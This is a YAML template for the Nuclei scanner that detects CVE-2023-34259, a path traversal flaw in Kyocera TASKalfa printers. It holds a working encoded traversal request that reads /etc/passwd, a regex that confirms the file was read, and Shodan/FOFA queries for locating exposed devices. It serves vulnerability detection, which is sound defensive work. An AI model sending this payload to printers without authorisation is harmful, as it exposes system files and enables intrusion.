id: CVE-2023-34259 info: name: Kyocera TASKalfa printer - Path Traversal author: gy741 severity: medium description: | CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/ - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html - https://sec-consult.com/vulnerability-lab/ - https://seclists.org/fulldisclosure/2023/Jul/15 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2023-34259 cwe-id: CWE-22 epss-score: 0.00559 epss-percentile: 0.77589 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: kyocera product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 fofa-query: icon_hash=-50306417 tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer http: - method: GET path: - "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - type: word part: server words: - "KM-MFP" - type: status status: - 200 # digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950